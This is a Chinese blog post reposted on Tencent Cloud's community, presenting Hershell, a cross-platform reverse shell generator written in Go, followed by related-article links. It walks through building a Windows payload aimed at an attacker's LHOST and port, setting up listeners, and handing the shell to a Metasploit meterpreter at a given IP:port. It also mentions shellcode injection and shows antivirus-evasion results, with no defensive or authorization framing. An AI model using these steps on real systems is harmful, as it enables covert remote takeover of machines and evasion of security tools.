专栏首页鸿鹄实验室Hershell-----一款多平台反向shell生成器

Hershell-----一款多平台反向shell生成器

Hershell是一款go语言编写的多平台反向shell生成器,使用tls加密流量,并提供证书公钥指纹固定功能,防止流量拦截。

支持的系统如下:

  • mac
  • linux
  • windows
  • FreeBSD及其衍生版本

安装Hershell(已安装go环境),使用go get github.com/lesnuages/hershell 即可拉取项目,或者使用git clone 拉取项目到本地也可。下面是工具的一些参数:

  • GOOS : the target OS
  • GOARCH : the target architecture
  • LHOST : the attacker IP or domain name
  • LPORT : the listener port
  • depends : generate the server certificate (required for the reverse shell)
  • windows32 : builds a windows 32 bits executable (PE 32 bits)
  • windows64 : builds a windows 64 bits executable (PE 64 bits)
  • linux32 : builds a linux 32 bits executable (ELF 32 bits)
  • linux64 : builds a linux 64 bits executable (ELF 64 bits)
  • macos32 : builds a mac os 32 bits executable (Mach-O)
  • macos64 : builds a mac os 64 bits executable (Mach-O)

一些额外的说明:

  • run_shell : drops you an system shell (allowing you, for example, to change directories)
  • inject <base64 shellcode> : injects a shellcode (base64 encoded) in the same process memory, and executes it
  • meterpreter [tcp|http|https] IP:PORT : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)
  • exit : exit gracefully

实操:

首先生成一个证书:

make depends

以windows为例,生成一个客户端,其他平台同理:

make windows64 LHOST=192.168.0.12 LPORT=1234

然后开启监听,可以使用如下程序监听:

  • socat
  • ncat
  • openssl server module
  • metasploit multi handler(python/shell_reverse_tcp_ssl payload)

以ncat为例;

在得到shell以后,还可以与msf进行同传,支持msf以下的payload:

  • windows/meterpreter/reverse_tcp
  • windows/x64/meterpreter/reverse_tcp
  • windows/meterpreter/reverse_http
  • windows/x64/meterpreter/reverse_http
  • windows/meterpreter/reverse_https
  • windows/x64/meterpreter/reverse_https

首先msf开启监听:

然后hershell进行同传:

[hershell]> meterpreter https 172.16.122.105:8443

msf收到shell

查杀效果如下(已对样本进行处理,避免被杀样本的情况):

本文分享自微信公众号 - 鸿鹄实验室(gh_a2210090ba3f),作者:鸿鹄实验室a

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-01-26

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Hershell:一款功能强大的跨平台反向Shell生成器

    Hershell是一款功能强大的跨平台反向Shell生成器,该工具使用Go语言开发,基于TCP反向Shell实现其功能。

    FB客服
  • 一些比较好的golang安全项目

    今天主要是推荐一些比较好的golang安全项目,帮助大家取好好学习怎么自己写一个NB的安全工具。

    七夜安全博客
  • Hacking with Golang

    根据一篇报道 显示,golang 成为继 python 之后最受黑客欢迎的工具语言。而且和 python 的差距正在缩小。golang 具有一些 python ...

    王磊-AI基础
  • ATtiny85漏洞利用框架HID测试分析

    今天的主角就是这款名叫Flashsploit的工具,它是一款基于ATtiny85的HID攻击的漏洞利用框架,广大研究人员可以在它的帮助下,可以对各类设备进行HI...

    FB客服
  • 渗透测试工具实战技巧合集(一)

    注:DIRB 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑...

    HACK学习
  • PhpSploit:一款隐蔽性极强的后渗透利用框架

    今天给大家介绍的是一款名叫PhpSploit的远程控制框架,该工具可以帮助攻击者在客户端与Web服务器端之间建立隐蔽性极强的交互式链接(类似Shell)。简而言...

    企鹅号小编
  • rsGen:一款基于Windows BAT和JS混编实现的通用反弹shell命令生成器

    rsGen是一款基于Widows BAT&JS混编实现的多功能反弹shell命令生成器。不仅支持生成原生反弹shell命令,还支持生成“命令中转”形式的一句话反...

    FB客服
  • CobaltStrike专题 | CobaltStrike监听及Payload使用

    声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企...

    贝塔安全实验室
  • 我是如何轻松拿到Google $1337现金奖励的

    一、 发现过程 时间回到5月8号的中午12点30分,饭后同事说新出的Jenknis漏洞RCE的EXP网上已经在转播了,当时记得那个漏洞是大概在5月1号出的,然后...

    FB客服
  • 甲方安全开源项目收集

    前阵子,我发布了一份甲方安全开源清单,不少朋友帮忙反馈,得到了大大的补充,重新整理了一份项目清单。

    Bypass
  • 安全攻防 | 23个常见Webshell网站管理工具

    声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关...

    贝塔安全实验室
  • 推荐一些优秀的甲方安全开源项目

    这是一份甲方安全开源项目清单,收集了一些比较优秀的安全开源项目,以帮助甲方安全从业人员构建企业安全能力。这些开源项目,每一个都在致力于解决一些安全问题。

    Bypass
  • 闭路电视探头究竟有多不安全?

    闭路电视探头在我们的生活中无所不在。最近的调查估计全英国大概有185万的监控摄像头,大部分都在私人住宅。大部分的探头都会连接到某些录像设备,也就是数字录像机(D...

    FB客服
  • 闭路电视探头究竟有多不安全?

    闭路电视探头在我们的生活中无所不在。最近的调查估计全英国大概有185万的监控摄像头,大部分都在私人住宅。大部分的探头都会连接到某些录像设备,也就是数字录像机(D...

    逸鹏
  • Powerglot:一款针对PoowerShell脚本的攻击性编码工具

    Powerglot是一款功能强大的攻击性PowerShell脚本编码工具,该工具基于Polyglots实现其功能。本质上来说,Powerglot是一款攻击性安全...

    FB客服
  • Mediator:一款功能强大的端到端加密反向Shell

    Mediator是一款功能强大的端到端加密反向Shell,该工具能够帮助研究人员跟一台“Mediator”服务器通过一个Shell连接起来,这样就不需要研究人员...

    FB客服
  • Lockdoor Framework:一套自带大量网络安全资源的渗透测试框架

    该项目目前仍处于v1.0 BETA测试版本开发阶段,因此使用过程中可能会出现bug,广大用户可以直接将问题反馈到项目的GitHub主页。

    FB客服
  • 嵌入式相关开源项目、库、资料大全

    学习初期最难找的就是找学习资料了,本贴精心汇总了一些嵌入式相关资源,包括但不限于编程语言、单片机、开源项目、物联网、操作系统、Linux等资源,并且在不断地更新...

    单片机点灯小能手
  • Weevely入手指南

    Weevely是一款python编写的webshell管理工具,作为编写语言使用python的一款工具,它最大的优点就在于跨平台,可以算作是linux下的一款菜...

    轩辕小子

扫码关注云+社区

领取腾讯云代金券